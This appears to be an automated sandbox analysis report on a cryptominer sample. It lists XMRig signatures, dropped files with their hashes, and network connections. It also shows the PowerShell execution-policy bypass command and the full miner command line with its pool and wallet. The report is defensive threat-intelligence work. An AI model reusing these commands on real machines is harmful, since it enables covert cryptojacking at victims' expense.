Analysis Overview
SHA256
08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b
Threat Level: Known bad
The file main2.rar was found to be: Known bad.
Malicious Activity Summary
XMRig Miner payload
xmrig
Blocklisted process makes network request
Executes dropped EXE
Command and Scripting Interpreter: PowerShell
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Suspicious behavior: LoadsDriver
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-27 00:27
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:15
Platform
win10-20240404-en
Max time kernel
1791s
Max time network
1761s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2908 wrote to memory of 4796 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2908 wrote to memory of 4796 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
Files
memory/2908-3-0x00007FFA016F3000-0x00007FFA016F4000-memory.dmp
memory/2908-6-0x000002C673140000-0x000002C673162000-memory.dmp
memory/2908-5-0x00007FFA016F0000-0x00007FFA020DC000-memory.dmp
memory/2908-9-0x00007FFA016F0000-0x00007FFA020DC000-memory.dmp
memory/2908-10-0x000002C673460000-0x000002C6734D6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kvhaacsx.qmr.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2908-25-0x00007FFA016F0000-0x00007FFA020DC000-memory.dmp
memory/2908-48-0x000002C673400000-0x000002C673412000-memory.dmp
memory/2908-61-0x000002C6733E0000-0x000002C6733EA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4796-90-0x0000020EA84D0000-0x0000020EA84F0000-memory.dmp
memory/4796-91-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/2908-92-0x00007FFA016F0000-0x00007FFA020DC000-memory.dmp
memory/2908-94-0x00007FFA016F3000-0x00007FFA016F4000-memory.dmp
memory/4796-93-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/2908-95-0x00007FFA016F0000-0x00007FFA020DC000-memory.dmp
memory/4796-96-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-97-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-98-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-99-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-100-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-101-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-102-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-103-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-104-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-105-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-106-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-107-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-108-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-109-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-110-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-111-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-112-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-113-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-114-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-115-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-116-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-117-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-118-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-119-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-120-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-121-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-122-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-123-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-124-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-125-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-126-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-127-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-128-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-129-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-130-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-131-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-132-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-133-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-134-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-135-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-136-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-137-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-138-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-139-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-140-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-141-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-142-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-143-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-144-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-145-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-146-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-147-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-148-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-149-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-150-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-151-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-152-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-153-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-154-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-155-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
memory/4796-156-0x00007FF7A3040000-0x00007FF7A3C73000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:16
Platform
win10v2004-20240508-en
Max time kernel
1791s
Max time network
1770s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3988 wrote to memory of 3544 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3988 wrote to memory of 3544 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 252.15.104.51.in-addr.arpa | udp |
Files
memory/3988-0-0x00007FFE30513000-0x00007FFE30515000-memory.dmp
memory/3988-2-0x000002CDE16A0000-0x000002CDE16C2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xqq3pg4h.nh5.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3988-11-0x00007FFE30510000-0x00007FFE30FD1000-memory.dmp
memory/3988-12-0x00007FFE30510000-0x00007FFE30FD1000-memory.dmp
memory/3988-14-0x00007FFE30510000-0x00007FFE30FD1000-memory.dmp
memory/3988-15-0x000002CDF9CC0000-0x000002CDF9CD2000-memory.dmp
memory/3988-16-0x000002CDF9CB0000-0x000002CDF9CBA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3544-47-0x000001CD94FD0000-0x000001CD94FF0000-memory.dmp
memory/3544-48-0x000001CD95020000-0x000001CD95040000-memory.dmp
memory/3544-49-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3988-50-0x00007FFE30510000-0x00007FFE30FD1000-memory.dmp
memory/3544-52-0x000001CD95040000-0x000001CD95060000-memory.dmp
memory/3544-53-0x000001CD95060000-0x000001CD95080000-memory.dmp
memory/3988-51-0x00007FFE30513000-0x00007FFE30515000-memory.dmp
memory/3544-54-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-55-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3988-56-0x00007FFE30510000-0x00007FFE30FD1000-memory.dmp
memory/3544-57-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-59-0x000001CD95060000-0x000001CD95080000-memory.dmp
memory/3544-58-0x000001CD95040000-0x000001CD95060000-memory.dmp
memory/3544-60-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-61-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-62-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-63-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-64-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-65-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-66-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-67-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-68-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-69-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-70-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-71-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-72-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-73-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-74-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-75-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-76-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-77-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-78-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-79-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-80-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-81-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-82-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-83-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-84-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-85-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-86-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-87-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-88-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-89-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-90-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-91-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-92-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-93-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-94-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-95-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-96-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-97-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-98-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-99-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-100-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-101-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-102-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-103-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-104-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-105-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-106-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-107-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-108-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-109-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-110-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-111-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-112-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-113-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-114-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-115-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-116-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-117-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
memory/3544-118-0x00007FF7B2100000-0x00007FF7B2D33000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:17
Platform
win11-20240426-en
Max time kernel
1797s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
